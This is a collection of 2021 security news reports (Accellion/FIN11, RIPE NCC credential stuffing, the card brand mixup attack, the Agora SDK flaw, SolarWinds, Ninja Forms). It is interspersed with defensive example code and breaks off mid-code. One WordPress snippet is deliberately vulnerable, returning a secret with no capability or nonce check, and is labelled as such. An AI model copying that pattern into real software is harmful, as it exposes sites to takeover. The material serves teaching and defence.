The company recently announced it is working to enhance the security of its platform and to prevent threat actors from accessing audio chats. Unfortunately, an attacker has now proved that the platform’s live audio can be siphoned.
Over the weekend, an unidentified attacker was able to stream Clubhouse audio feeds from multiple rooms into their own third-party website.
In response to the malicious activity, the company permanently banned the account used by the attacker and deployed new “safeguards” to prevent similar attacks in the future, but Clubhouse could not guarantee that it will not happen again.
Representatives of the Stanford Internet Observatory declared that users should assume all conversations are being recorded by the company, a circumstance that raises concerns because they have no information on how the conversations are stored.
“Clubhouse cannot provide any privacy promises for conversations held anywhere around the world,” said Alex Stamos, director of Stanford Internet Observatory and former Facebook CSO.
The privacy questions raised are not limited to the way data is stored; experts such as Stamos point out that Clubhouse runs its back-end operations with the support of the Chinese start-up Agora Inc.
“Clubhouse’s dependence on Agora raises extensive privacy concerns, especially for Chinese citizens and dissidents under the impression their conversations are beyond the reach of state surveillance,” Stamos said, as reported by Bloomberg.
Agora responded to the privacy concerns saying that it doesn’t store personally identifiable information of its clients.
Over the weekend, cybersecurity expert Robert Potter noticed a user found a way to remotely share his login with a third-party site.
The measures implemented by the company were not publicly disclosed; they likely include restrictions on third-party applications accessing chatroom audio without actually entering a room. Another mitigation could be limiting the number of rooms a user can enter simultaneously, as suggested by Jack Cable of the Stanford Internet Observatory.
Attacks Targeting Accellion Product Linked to FIN11 Cybercrime Group
23.2.2021 Hacking Securityweek
The hacking group behind the recent cyber-attack targeting Accellion’s FTA file transfer service appears to be linked to a threat actor known as FIN11, security researchers with FireEye’s Mandiant division reveal.
The attacks on FTA, a soon-to-be-retired service, started in mid-December 2020 and resulted in the compromise of data pertaining to multiple Accellion customers. As part of the attack, the adversaries targeted multiple vulnerabilities in the file transfer service.
Some of the affected Accellion customers include grocery and pharmacy chain Kroger, Australian Securities and Investments Commission (ASIC), U.S.-based law firm Jones Day, the Office of the Washington State Auditor (SAO), the Reserve Bank of New Zealand, and Singapore telecoms firm Singtel.
The attackers abused multiple vulnerabilities in FTA to gain access to and exfiltrate data, namely CVE-2021-27101 (SQL injection), CVE-2021-27102 (OS command execution), CVE-2021-27103 (SSRF), and CVE-2021-27104 (OS command execution).
Accellion says that all of these vulnerabilities have already been addressed and that, out of “300 total FTA clients, fewer than 100 were victims of the attack,” with fewer than 25 suffering “significant data theft.”
“Accellion strongly recommends that FTA customers migrate to kiteworks, Accellion’s enterprise content firewall platform. These exploits apply exclusively to Accellion FTA clients: neither kiteworks nor Accellion the company were subject to these attacks,” Accellion said on Monday.
FireEye’s Mandiant security researchers have been tracking both the activity surrounding the exploitation of the Accellion FTA zero-day vulnerabilities and the data theft that resulted from the cyber-attack, and say they have discovered a connection between the attacks, extortion attempts related to the stolen data, and the FIN11 group.
A financially-motivated threat actor, FIN11 was previously described as a TA505 spin-off, engaging in ransomware and extortion activities that typically start with phishing emails. Previously, the attackers were associated with the use of the FlawedAmmyy and the CLOP ransomware.
Tracked as UNC2546, the adversary that targeted FTA exploited the SQL injection vulnerability for initial access, which allowed them to retrieve a key used in conjunction with a request to a specific file, followed by the execution of the built-in Accellion utility admin.pl and the deployment of a web shell.
Dubbed DEWMODE, the web shell allowed the attackers to fetch a list of available files and corresponding metadata (file ID, filename, path, recipient, and uploader) from a MySQL database, as well as to download the files themselves.
Weeks after the data theft occurred, the security researchers observed extortion attempts related to the data. The extortion emails received by the victims threatened to make the information public on the “CL0P^_- LEAKS” .onion website, which Mandiant has associated with a different actor, tracked as UNC2582.
“Despite tracking the exploitation and extortion activity in separate threat clusters we have observed at least one case where an actor interacted with a DEWMODE web shell from a host that was used to send UNC2582-attributed extortion email,” Mandiant says.
The UNC2582 threat actor, the researchers explain, initially sends extortion emails to a small number of addresses within the target organization. If no reply is received in a timely manner, the messages are sent to multiple other addresses.
Furthermore, the adversary appears to be following through with the threats, publishing victim data on the CL0P^_- LEAKS shaming website. Recently, information stolen from at least two organizations affected by the FTA cyber-attack was published on the site.
Mandiant also discovered some overlaps between the UNC2582 and FIN11 infrastructure, as some of the email messages were sent from IP addresses and/or email accounts that FIN11 previously used in various phishing attacks.
FIN11 is known to pause its activities over the winter holidays, and the recent hiatus overlaps with UNC2582’s data theft extortion activity. Furthermore, links that the extortionists sent to their victims pointed to websites previously used in ransomware and data theft extortion campaigns attributed to FIN11.
The researchers also identified overlaps between UNC2546 and FIN11 activities, such as the targeting of the same organizations, and the use of an IP address (to communicate with a DEWMODE web shell) that was in a network frequently used by FIN11 for a piece of malware named FRIENDSPEAK.
“The overlaps between FIN11, UNC2546, and UNC2582 are compelling, but we continue to track these clusters separately while we evaluate the nature of their relationships. One of the specific challenges is that the scope of the overlaps with FIN11 is limited to the later stages of the attack life cycle,” Mandiant concludes.
Credential-Stuffing Attack Targets Regional Internet Registry
20.2.2021 Hacking Threatpost
RIPE NCC, the regional Internet registry for Europe, West Asia, and the former Soviet Union, said attackers attempted a credential-stuffing attack against its single-sign on service.
Regional internet registry RIPE NCC is warning of a credential-stuffing attack against its single sign-on service, RIPE NCC Access, and is encouraging users to implement two-factor authentication (2FA).
Located in Amsterdam, the Réseaux IP Européens Network Coordination Centre (RIPE NCC) is the regional internet registry for Europe, Western Asia and the former Soviet Union. RIPE NCC said that the attack, which occurred last weekend, caused “some downtime.” However, it said that preliminary investigations do not yet reveal that any single sign-on (SSO) accounts have been compromised.
“We would like to ask you to enable two-factor authentication on your RIPE NCC Access account if you have not already done so, to ensure that your account is secure,” the RIPE NCC told account holders in a Thursday security notice. “In general, using two-factor authentication across all your accounts can help limit your exposure to such attacks.”
What is RIPE NCC?
A regional internet registry is an organization that manages the registration of internet number resources within various regions worldwide. Such “internet number resources” include IPv4 and IPv6 addresses – which provide the underlying technology making it possible for people to connect their devices to the web — and autonomous system numbers (ASNs), which uniquely identify each network on the internet.
RIPE NCC is one of five regional internet registries providing internet resource allocations and registration services, which together support the internet globally.
RIPE NCC has 20,000 members from more than 75 countries. These members can receive and register internet number resource allocations, and they are then responsible for distributing and registering these resources at a local level.
In the case of the credential-stuffing attack against RIPE NCC, “the data that could be exposed are internet sources such as IP addresses allocated to internet providers, hosting providers and organizations,” Niamh Muldoon, global data protection officer with OneLogin, told Threatpost.
If they were able to access this data, “attackers could then use these details to try and masquerade as one of these providers and/or use the information to build intelligence to identify a vulnerable part of the network to try and exploit,” Muldoon explained.
What is a Credential-Stuffing Attack?
A credential-stuffing attack occurs when a cybercriminal utilizes stolen account credentials and attempts to match them up against a web application or service via large-scale, automated login requests. The aim of this attack is to achieve unauthorized access to accounts.
“Credential-stuffing attacks continue to be the most common opportunistic attack, just because the barrier of entry is low,” Marcus Hartwig, manager of Security Analytics at Vectra, told Threatpost. “Databases of credentials from previous data breaches are widely available, often for free, and have a high success ratio, and preventative measures like multifactor authentication (MFA) are easy to circumvent for determined attackers.”
Credential stuffing has been commonly utilized in recent years, forcing targeted companies like The North Face (hit in November), Dunkin’ Donuts (hit twice, in December 2018 and February 2019) and Spotify (hit twice, in December and in February) to force password resets for impacted users.
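The defining traits of credential stuffing described above, automated logins, many distinct accounts, one or a few attempts per account and a high failure ratio, are what a detection rule keys on, and they also separate it from a password brute force against a single account. The following added example (not RIPE NCC's tooling; the log format, addresses and thresholds are constructed assumptions) runs that logic over a handful of sample SSO log lines and lists the accounts a successful hit inside a stuffing burst points at, which are the account holders an operator would contact, as RIPE NCC said it would do.

```python
"""Separate credential stuffing from password brute force in SSO login logs.
Added example; the log format, addresses and thresholds are constructed
assumptions, not RIPE NCC's data or tooling."""
from collections import defaultdict
from datetime import datetime

# Constructed log: timestamp, source IP, username, outcome.  198.51.100.7 replays
# one breached username:password pair per account; 203.0.113.9 hammers a single
# account; 192.0.2.44 is a user who mistyped once.
SAMPLE_LOG = """\
2021-02-13T22:00:01Z 198.51.100.7 alice FAIL
2021-02-13T22:00:01Z 198.51.100.7 bob FAIL
2021-02-13T22:00:02Z 198.51.100.7 carol OK
2021-02-13T22:00:02Z 198.51.100.7 dave FAIL
2021-02-13T22:00:02Z 198.51.100.7 erin FAIL
2021-02-13T22:00:03Z 198.51.100.7 frank FAIL
2021-02-13T22:00:03Z 198.51.100.7 grace FAIL
2021-02-13T22:00:04Z 198.51.100.7 heidi FAIL
2021-02-13T22:00:04Z 198.51.100.7 ivan FAIL
2021-02-13T22:00:05Z 198.51.100.7 judy FAIL
2021-02-13T22:01:00Z 203.0.113.9 admin FAIL
2021-02-13T22:01:05Z 203.0.113.9 admin FAIL
2021-02-13T22:01:10Z 203.0.113.9 admin FAIL
2021-02-13T22:01:15Z 203.0.113.9 admin FAIL
2021-02-13T22:01:20Z 203.0.113.9 admin FAIL
2021-02-13T22:01:25Z 203.0.113.9 admin FAIL
2021-02-13T22:01:30Z 203.0.113.9 admin FAIL
2021-02-13T22:01:35Z 203.0.113.9 admin FAIL
2021-02-13T22:05:00Z 192.0.2.44 alice FAIL
2021-02-13T22:05:20Z 192.0.2.44 alice OK
"""


def parse_line(line):
    ts, ip, user, outcome = line.split()
    return datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ"), ip, user, outcome == "OK"


def analyse(log_text, min_attempts=8, min_users=5, min_fail_ratio=0.8):
    """Per source IP: verdict, attempt rate, and accounts that may have been taken over."""
    by_ip = defaultdict(list)
    for line in log_text.strip().splitlines():
        ev = parse_line(line)
        by_ip[ev[1]].append(ev)
    findings = {}
    for ip, evs in by_ip.items():
        evs.sort()
        attempts = len(evs)
        users = {u for _, _, u, _ in evs}
        fails = sum(1 for _, _, _, ok in evs if not ok)
        fail_ratio = fails / attempts
        span = (evs[-1][0] - evs[0][0]).total_seconds() or 1.0
        if attempts >= min_attempts and fail_ratio >= min_fail_ratio:
            # many accounts, one try each: a breached list being replayed;
            # one account, many tries: a password brute force
            verdict = "credential_stuffing" if len(users) >= min_users else "password_brute_force"
        else:
            verdict = "benign"
        # a success inside a flagged burst is an account to contact and reset
        takeovers = sorted({u for _, _, u, ok in evs if ok}) if verdict != "benign" else []
        findings[ip] = {
            "verdict": verdict,
            "attempts": attempts,
            "distinct_users": len(users),
            "fail_ratio": round(fail_ratio, 2),
            "attempts_per_min": round(attempts * 60 / span, 1),
            "takeovers": takeovers,
        }
    return findings


def accounts_to_reset(findings):
    """Union of suspected takeovers across all flagged sources."""
    return sorted({u for f in findings.values() for u in f["takeovers"]})


if __name__ == "__main__":
    results = analyse(SAMPLE_LOG)
    for ip, finding in results.items():
        print(ip, finding)
    print("reset:", accounts_to_reset(results))
```

Per-IP grouping is the simplest cut; a distributed campaign that spreads a breached list over many proxies stays under `min_attempts` per address, so in practice the same statistics are also computed per username set and per ASN, and a rule like this feeds rate limiting and step-up authentication rather than blocking on its own. The `takeovers` list is the operational output: those are the accounts that would have been protected by 2FA and that now need a reset and a notification.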
RIPE NCC: Enabling Two-Factor Authentication
RIPE NCC said that the attack has been mitigated. It also said it is now taking steps to ensure its services are “better protected against such threats in the future” – including asking users to enable 2FA, where a one-time code will be required to sign in.
“If we do find that an account has been affected in the course of our investigations, we will contact the account holder individually to inform them,” according to RIPE NCC.
Security experts like Joseph Carson, advisory CISO at Thycotic, said that the incident points to the importance of password hygiene and 2FA – especially as credential-stuffing attacks continue to increase.
“An important lesson that must be learned from this is that we should never reuse passwords,” Carson told Threatpost. “Companies who offer authentication and log into their website must also move away from having a password as the only security control. 2FA must be enabled for all customers as this reduces the risks of those who reuse passwords from becoming a victim of a cybercrime or credential stuffing from being successful.”
New Hack Lets Attackers Bypass MasterCard PIN by Using Them As Visa Card
20.2.2021 Hacking Thehackernews
Cybersecurity researchers have disclosed a novel attack that could allow criminals to trick a point of sale terminal into transacting with a victim's Mastercard contactless card while believing it to be a Visa card.
The research, published by a group of academics from the ETH Zurich, builds on a study detailed last September that delved into a PIN bypass attack, permitting bad actors to leverage a victim's stolen or lost Visa EMV-enabled credit card for making high-value purchases without knowledge of the card's PIN, and even fool the terminal into accepting unauthentic offline card transactions.
"This is not just a mere card brand mixup but it has critical consequences," researchers David Basin, Ralf Sasse, and Jorge Toro said. "For example, criminals can use it in combination with the previous attack on Visa to also bypass the PIN for Mastercard cards. The cards of this brand were previously presumed protected by PIN."
Following responsible disclosure, ETH Zurich researchers said Mastercard implemented defense mechanisms at the network level to thwart such attacks. The findings will be presented at the 30th USENIX Security Symposium in August later this year.
A Card Brand Mixup Attack
Just like the previous attack involving Visa cards, the latest research too exploits "serious" vulnerabilities in the widely used EMV contactless protocol, only this time the target is a Mastercard card.
At a high level, this is achieved using an Android application that implements a man-in-the-middle (MitM) attack atop a relay attack architecture, thereby allowing the app to not only initiate messages between the two ends — the terminal and the card — but also to intercept and manipulate the NFC (or Wi-Fi) communications to maliciously introduce a mismatch between the card brand and the payment network.
Put differently, if the card issued is Visa or Mastercard branded, then the authorization request needed for facilitating EMV transactions is routed to the respective payment network. The payment terminal recognizes the brand using a combination of what's called a primary account number (PAN, also known as the card number) and an application identifier (AID) that uniquely identifies the type of card (e.g., Mastercard Maestro or Visa Electron), and subsequently makes use of the latter to activate a specific kernel for the transaction.
An EMV Kernel is a set of functions that provides all the necessary processing logic and data that is required to perform an EMV contact or contactless transaction.
The attack, dubbed "card brand mixup," takes advantage of the fact that these AIDs are not authenticated to the payment terminal, thus making it possible to deceive a terminal into activating a flawed kernel, and by extension, the bank that processes payments on behalf of the merchant, into accepting contactless transactions with a PAN and an AID that indicate different card brands.
"The attacker then simultaneously performs a Visa transaction with the terminal and a Mastercard transaction with the card," the researchers outlined.
The attack does, however, have a number of prerequisites. Notably, the criminals must have access to the victim's card, and must be able to modify the terminal's commands and the card's responses before delivering them to the corresponding recipient. It does not require root privileges or the exploitation of Android flaws in order to run the proof-of-concept (PoC) application.
But the researchers note a second shortcoming in the EMV contactless protocol could let an attacker "build all necessary responses specified by the Visa protocol from the ones obtained from a non-Visa card, including the cryptographic proofs needed for the card issuer to authorize the transaction."
Mastercard Adds Countermeasures
Using the PoC Android app, ETH Zurich researchers said they were able to bypass PIN verification for transactions with Mastercard credit and debit cards, including two Maestro debit and two Mastercard credit cards, all issued by different banks, with one of the transactions exceeding $400.
In response to the findings, Mastercard has added a number of countermeasures, including mandating financial institutions to include the AID in the authorization data, allowing card issuers to check the AID against the PAN.
Additionally, the payment network has rolled out checks for other data points present in the authorization request that could be used to identify an attack of this kind, thereby declining a fraudulent transaction right at the outset.
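The issuer-side check described above, written out as an added example (not the ETH Zurich researchers' or Mastercard's code): the brand implied by the PAN is compared with the brand implied by the AID carried in the authorization data, and a mismatch is declined. The RID-to-brand table and PAN prefix ranges are standard public values; the sample authorization requests are constructed test data.

```php
<?php
// Added example: an issuer-side "card brand mixup" consistency check.
// Not the researchers' or Mastercard's code; sample data is constructed.

// The first five bytes of an AID are the registered application provider
// identifier (RID). A000000003 belongs to Visa, A000000004 to Mastercard.
const RID_BRAND = array(
    'A000000003' => 'visa',
    'A000000004' => 'mastercard',
);

function brand_from_aid( string $aid ): ?string {
    $rid = strtoupper( substr( $aid, 0, 10 ) );
    return RID_BRAND[ $rid ] ?? null;
}

// Brand from the PAN prefix: Visa PANs start with 4; Mastercard uses the
// 51-55 and 2221-2720 ranges. Anything else is reported as unclassified.
function brand_from_pan( string $pan ): ?string {
    if ( ! ctype_digit( $pan ) || strlen( $pan ) < 12 ) {
        return null;
    }
    if ( $pan[0] === '4' ) {
        return 'visa';
    }
    $two  = (int) substr( $pan, 0, 2 );
    $four = (int) substr( $pan, 0, 4 );
    if ( ( $two >= 51 && $two <= 55 ) || ( $four >= 2221 && $four <= 2720 ) ) {
        return 'mastercard';
    }
    return null;
}

// 'approve' when both sides name the same brand, 'decline' on a mismatch,
// 'review' when either side cannot be classified. A real issuer also checks
// the cryptogram, CVM results and velocity rules; those are out of scope here.
function brand_mixup_decision( array $auth ): string {
    $pan_brand = brand_from_pan( $auth['pan'] );
    $aid_brand = brand_from_aid( $auth['aid'] );
    if ( $pan_brand === null || $aid_brand === null ) {
        return 'review';
    }
    return $pan_brand === $aid_brand ? 'approve' : 'decline';
}

// Constructed authorization requests (test PANs, not real cards).
$samples = array(
    // Mastercard PAN, Mastercard credit/debit AID: consistent.
    array( 'pan' => '5555555555554444', 'aid' => 'A0000000041010' ),
    // Mastercard PAN but the terminal ran the Visa kernel: the mixup case.
    array( 'pan' => '5555555555554444', 'aid' => 'A0000000031010' ),
    // Visa PAN, Visa AID: consistent.
    array( 'pan' => '4111111111111111', 'aid' => 'A0000000031010' ),
    // Unclassified PAN range: flagged for manual review rather than guessed.
    array( 'pan' => '6011000000000004', 'aid' => 'A0000000041010' ),
);

foreach ( $samples as $s ) {
    printf( "PAN %s  AID %s  -> %s\n", $s['pan'], $s['aid'], brand_mixup_decision( $s ) );
}
```

The second sample is the shape of the attack: the PAN routes the authorization to Mastercard, but the AID says a Visa transaction was performed with the terminal, which is exactly the discrepancy the new countermeasure lets the issuer see.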
SDK Bug Lets Attackers Spy on User’s Video Calls Across Dating, Healthcare Apps
19.2.2021 Hacking Threatpost
Apps like eHarmony and MeetMe are affected by a flaw in the Agora toolkit that went unpatched for eight months, researchers discovered.
A vulnerability in an SDK that allows users to make video calls in apps like eHarmony, Plenty of Fish, MeetMe and Skout allows threat actors to spy on private calls without the user knowing.
Researchers discovered the flaw, CVE-2020-25605, in a video-calling SDK from a Santa Clara, Calif.-based company called Agora while doing a security audit last year of a personal robot called “temi,” which uses the toolkit.
Agora provides developer tools and building blocks for providing real-time engagement in apps, and documentation and code repositories for its SDKs are available online. Healthcare apps such as Talkspace, Practo and Dr. First’s Backline, among various others, also use the SDK for their call technology.
SDK Bug Could Have Impacted Millions
Due to its shared use in a number of popular apps, the flaw has the potential to affect “millions–potentially billions–of users,” reported Douglas McKee, principal engineer and senior security researcher at McAfee Advanced Threat Research (ATR), on Wednesday.
McKee said he did not find evidence of the bug being exploited in the wild.
The flaw makes it easy for third parties to access details about setting up video calls from within the SDK across various apps due to their unencrypted, cleartext transmission. This paves the way for remote attackers to “obtain access to audio and video of any ongoing Agora video call through observation of cleartext network traffic,” according to the vulnerability’s CVE description.
Researchers reported this research to Agora.io on April 20, 2020. The flaw remained unpatched for about eight months until Dec. 17, 2020 when the company released a new SDK, version 3.2.1, “which mitigated the vulnerability and eliminated the corresponding threat to users,” McKee said.
Researchers first were alerted to an issue when, during their analysis of the temi ecosystem, they found a hardcoded key in the Android app that pairs with the temi robot. Upon further exploration, they found a connection to the Agora SDK through “detailed logging” by developers to the Agora.io dashboard, McKee said.
Upon examination of the Agora video SDK, researchers discovered that it allows information to be sent in plaintext across the network to initiate a video call. They then ran tests using sample apps from Agora to see if third parties could leverage this scenario to spy on a user.
SDK Bug Allows Attackers to Circumvent Encryption
What they discovered through a series of steps is that they can, a scenario that affects various apps using the SDK, according to McKee. Further, threat actors can hijack key details about calls being made from within apps even if encryption is enabled on the app, he said.
The first step for an attacker to exploit the vulnerability is to identify the proper network traffic he or she wants to target. ATR achieved this by building a network layer in less than 50 lines of code using a Python framework called Scapy “to help easily identify the traffic the attacker cares about,” McKee explained.
“This was done by reviewing the video call traffic and reverse-engineering the protocol,” he said. In this way researchers were able to sniff network traffic to gather information pertaining to a call of interest and then launch their own Agora video applications to join the call, “completely unnoticed by normal users,” McKee wrote.
While developers do have the option in the Agora SDK to encrypt the call, key details about the calls are still sent in plaintext, allowing attackers to acquire these values and use the ID of the associated app “to host their own calls at the cost of the app developer,” McKee explained.
However, if developers encrypt calls using the SDK, attackers can’t view video or hear audio of the call, he said. Still, while this encryption is available, it’s not widely adopted, McKee added, “making this mitigation largely impractical” for developers.
Other Apps Impacted by Faulty SDK
In fact, in addition to temi, researchers examined a cross-section of apps on Google Play that use Agora—including MeetMe, Skout and Nimo TV—and found that all four of the applications have hardcoded App IDs that allow access to call details and do not enable encryption.
“Even though the encryption functions are being called, the application developers are actually disabling the encryption based on this documentation,” McKee explained. “Without encryption enabled and the setup information passed in cleartext, an attacker can spy on a very large range of users.”
Agora did not immediately respond to an email request for comment sent by Threatpost on Thursday. ATR said the company “was very receptive and responsive to receiving” information about the vulnerability, and that after testing the SDK they “can confirm it fully mitigates CVE-2020-25605.”
SolarWinds hackers had access to components used by Azure, Intune, and Exchange
19.2.2021 Hacking Securityaffairs
Microsoft announced that SolarWinds hackers could have had access to repositories containing some components used by Azure, Intune, and Exchange.
Microsoft announced that the threat actors behind the SolarWinds supply chain attack could have had access to repositories containing the source code for a limited number of components used by Azure, Intune, and Exchange.
In December, Microsoft experts revealed that SolarWinds hackers could have compromised a small number of internal accounts and used at least one of them to view source code in a number of source code repositories.
Shortly after the disclosure of the SolarWinds attack, Microsoft confirmed that it was one of the companies breached in the recent supply chain attack, but the IT giant denied that the nation-state actors compromised its software supply-chain to infect its customers.
Frank Shaw, the corporate vice president of communications at Microsoft, confirmed that the company had detected multiple malicious SolarWinds binaries in its environment.
The good news is that, according to an investigation update provided by Microsoft, the attackers only viewed a few individual files.
However, for some repositories, including ones for Azure, Intune, and Exchange, the attackers could download component source code.
“There was no case where all repositories related to any single product or service was accessed. There was no access to the vast majority of source code. For nearly all of code repositories accessed, only a few individual files were viewed as a result of a repository search. For a small number of repositories, there was additional access, including in some cases, downloading component source code.” reads the update provided by Microsoft.
“These repositories contained code for:
a small subset of Azure components (subsets of service, security, identity)
a small subset of Intune components
a small subset of Exchange components”
The IT giant revealed that attackers used search terms in an attempt to find secrets, such as login credentials to use for lateral movements in the corporate networks.
Microsoft added that its development policy prohibits secrets in code, and that it uses automated tools to verify compliance.
“Because of the detected activity, we immediately initiated a verification process for current and historical branches of the repositories. We have confirmed that the repositories complied and did not contain any live, production credentials.” continues the company.
The SolarWinds attack demonstrated the importance of embracing a Zero Trust mindset and protecting privileged credentials.
“A Zero Trust, “assume breach” philosophy is a critical part of defense. Zero Trust is a transition from implicit trust—assuming that everything inside a corporate network is safe—to the model that assumes breach and explicitly verifies the security status of identity, endpoint, network, and other resources based on all available signals and data.” concludes Microsoft.
Ninja Forms WordPress Plugin Bug Opens Websites to Hacks
18.2.2021 Hacking Threatpost
The popular plugin is installed on more than 1 million websites, and has four flaws that allow various kinds of serious attacks, including site takeover and email hijacking.
Ninja Forms, a WordPress plugin used by more than 1 million sites, contains four critical security vulnerabilities that together make it possible for a remote attacker to take over a WordPress site and create various kinds of problems.
Ninja Forms offers WordPress site designers the ability to create forms using a drag-and-drop capability, with no coding skills required.
The four bugs allow lower-privileged users (even those who have simply registered for a site) to carry out a range of malicious activity. That includes eavesdropping on site email, taking over admin accounts, installing arbitrary add-ons to a target site and redirecting site owners to malicious destinations.
Three of the bugs do require social engineering to be successful.
Bug 1: Authenticated Email Hijacking and Account Takeover with SendWP Plugin
The first bug allows attackers with subscriber-level access or above to abuse SendWP to intercept all mail traffic, including password reset links for administrative accounts, researchers said. SendWP is an email delivery and logging service intended to make mail handling with WordPress simpler.
Attackers with subscriber or above access to a vulnerable WordPress site could establish a SendWP connection with their own SendWP account, so that all mail from the WordPress site would be routed through and logged in the attacker's SendWP account.
If exploited, this could ultimately lead to remote code execution and site takeover by using an admin account to modify theme/plugin files or uploading a malicious theme/plugin, according to Wordfence, which said the flaw also carries an estimated CVSS rating of 9.9 out of 10 (CVEs are pending for all bugs).
“At that point they can monitor all data emailed which could range from user personally identifiable information (PII) from form submissions to reports generated on your site,” researchers warned. “Further, an attacker could trigger a password reset for an administrative user account, if they could discover the username for an account.”
Accomplishing this is not that difficult, according to the Wordfence analysis, released on Tuesday.
“In order to provide this functionality, the plugin registers the AJAX action wp_ajax_ninja_forms_sendwp_remote_install,” researchers explained. “This AJAX action is tied to the function wp_ajax_ninja_forms_sendwp_remote_install_handler, that checks to see if the SendWP plugin is installed and activated. If the plugin is not currently installed, then it performs the installation and activation of the SendWP plugin.”
Once the plugin has been installed successfully, the function will return the registration url, along with the client_name, client_secret, register_url and client_url. This is used to show users the sign-up page and easily connect their WordPress instance with SendWP.
“Unfortunately, this AJAX action did not have a capability check on it, nor did it have any nonce protection, therefore making it possible for low-level users, such as subscribers, to install and activate the SendWP plugin and retrieve the client_secret key needed to establish the SendWP connection,” according to the analysis.
A potential mitigation to widespread, automated exploitation is the fact that SendWP is a paid add-on, costing $9 per month per site, researchers noted.
Bug 2: Authenticated OAuth Connection Key Disclosure
The second bug carries an estimated CVSS score of 7.7, and is present in the Ninja Forms “Add-on Manager” service, a centralized dashboard that allows users to remotely manage all purchased Ninja Forms add-ons.
According to Wordfence, attackers could establish an OAuth connection for a vulnerable WordPress site with their own account, and be able to install any purchased Add-On plugins on the target site that they choose.
In order to complete the malicious connection, attackers would need to trick the site administrator into clicking a special link to update the client_id parameter in the site database with an altered AJAX action.
“The plugin registers the AJAX action wp_ajax_nf_oauth which is used to retrieve the connection_url that contains the information necessary, like the client_secret, to establish an OAuth connection with the Ninja Forms Add-On Management portal,” according to the analysis. “Unfortunately, there was no capability check on this function.”
That means that low-level users, such as subscribers, were able to trigger the action and retrieve the connection URL needed to establish a connection with the dashboard. Attackers could also retrieve the client_id for an already established OAuth connection, researchers said.
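Bugs 1 and 2 share one root cause: an AJAX action that hands out a connection secret without a capability check or a nonce. As an added example (not Ninja Forms' code; the action, option and script names are hypothetical), here is that pattern in its vulnerable form next to a hardened handler that does both checks before touching the secret.

```php
<?php
// Added example, not the plugin's own code. Action, option, script and
// capability names are hypothetical; the structure is what matters.

// --- Vulnerable pattern -------------------------------------------------
// wp_ajax_* handlers run for any logged-in user. With no capability check
// and no nonce, a subscriber can call this and read the connection secret.
add_action( 'wp_ajax_example_connect_vulnerable', 'example_connect_vulnerable' );
function example_connect_vulnerable() {
    $secret = get_option( 'example_client_secret' );
    wp_send_json_success( array( 'client_secret' => $secret ) );
}

// --- Hardened pattern ---------------------------------------------------
add_action( 'wp_ajax_example_connect', 'example_connect_hardened' );
function example_connect_hardened() {
    // 1. Nonce: ties the request to a token issued to this user on the admin
    //    page, so a forged request from another site fails. check_ajax_referer()
    //    terminates the request itself when the nonce is missing or invalid.
    check_ajax_referer( 'example_connect', 'nonce' );

    // 2. Capability: only users who may install plugins get the secret that
    //    lets a remote service install add-ons. Subscribers do not have this.
    if ( ! current_user_can( 'install_plugins' ) ) {
        wp_send_json_error( array( 'message' => 'Insufficient permissions.' ), 403 );
    }

    // Only now is it safe to create or return the secret.
    $secret = get_option( 'example_client_secret' );
    if ( empty( $secret ) ) {
        $secret = wp_generate_password( 32, false );
        update_option( 'example_client_secret', $secret, false ); // not autoloaded
    }
    wp_send_json_success( array( 'client_secret' => $secret ) );
}

// Issue the nonce to the legitimate admin UI so its JavaScript can include it
// as the "nonce" POST field when calling action=example_connect.
add_action( 'admin_enqueue_scripts', function () {
    wp_register_script( 'example-admin', plugin_dir_url( __FILE__ ) . 'admin.js', array(), '1.0', true );
    wp_localize_script( 'example-admin', 'exampleAjax', array(
        'url'   => admin_url( 'admin-ajax.php' ),
        'nonce' => wp_create_nonce( 'example_connect' ),
    ) );
    wp_enqueue_script( 'example-admin' );
} );
```

Both checks are needed: the capability check alone still lets an administrator be tricked into making the request from another site, and the nonce alone still lets any logged-in user make it directly.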
Bug 3: Cross-Site Request Forgery to OAuth Service Disconnection
The third bug exists in the Ninja Forms Add-Ons Manager’s ability to easily disconnect an established OAuth connection with just a few clicks. This bug carries a 6.1 CVSS rating, making it medium-severity.
Attackers could send a request to disconnect the current OAuth connection – Wordfence noted that this “could be a puzzling experience for a site owner.” To do so, they would need to craft a legitimate request, host it externally, and trick an administrator into clicking a link or attachment.
“In order to provide this functionality, the plugin registered an AJAX action wp_ajax_nf_oauth_disconnect tied to the function disconnect(). The disconnect() function would simply disconnect an established connection by deleting the options associated with the connection settings in the database,” according to Wordfence. “Unfortunately, this feature did not have nonce protection.”
Bug 4: Administrator Open Redirect
The final issue is present in the OAuth connection process; it’s considered medium-severity with a CVSS score of 4.8.
To exploit this, an attacker would need to craft a special URL with the redirect parameter set to an arbitrary site, and then socially engineer an administrator into clicking the link. If successful, the administrator could be redirected to an external malicious site which could infect the administrator’s computer with malware.
“The plugin registers an AJAX action, wp_ajax_nf_oauth_connect, that is registered to the function connect() which is used to redirect a site owner back to the WordPress site’s Ninja Forms service page after the user has finished the OAuth connection process,” according to the analysis. “This function uses wp_safe_redirect to redirect site owners back to the admin.php?page=ninja-forms#services page by default.”
However, the issue is that the ‘redirect’ parameter can be swapped out with different values, to instead redirect the site administrator to an arbitrary URL supplied in that parameter.
“There is no protection on the redirection URL validating where the redirect goes, nor was there any protection to prevent an attacker from using the function to redirect a site administrator to a malicious location,” researchers explained. “There was the use of wp_verify_nonce(), however, it was commented out and rendered unusable.”
Saturday Drive, the plugin’s parent company, has patched all of the bugs in version 3.4.34.1.
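For Bug 4, an added example (not the plugin's code; action, nonce and page slug are hypothetical) of a post-OAuth redirect handler that keeps the nonce check live and pins the destination to the plugin's own admin page instead of trusting a caller-supplied redirect parameter.

```php
<?php
// Added example, not Ninja Forms' code. Names are hypothetical.

add_action( 'wp_ajax_example_oauth_connect', 'example_oauth_connect' );
function example_oauth_connect() {
    // The original bug had wp_verify_nonce() commented out. Here a request
    // without a valid nonce is rejected before any redirect happens.
    $nonce = isset( $_GET['_wpnonce'] ) ? sanitize_text_field( wp_unslash( $_GET['_wpnonce'] ) ) : '';
    if ( ! wp_verify_nonce( $nonce, 'example_oauth_connect' ) ) {
        wp_die( 'Invalid request.', 'Forbidden', array( 'response' => 403 ) );
    }
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( 'Insufficient permissions.', 'Forbidden', array( 'response' => 403 ) );
    }

    $default = admin_url( 'admin.php?page=example-plugin#services' );
    $target  = isset( $_GET['redirect'] ) ? esc_url_raw( wp_unslash( $_GET['redirect'] ) ) : $default;

    // wp_safe_redirect() already refuses hosts outside allowed_redirect_hosts
    // and falls back to the admin URL. On top of that, only accept a target
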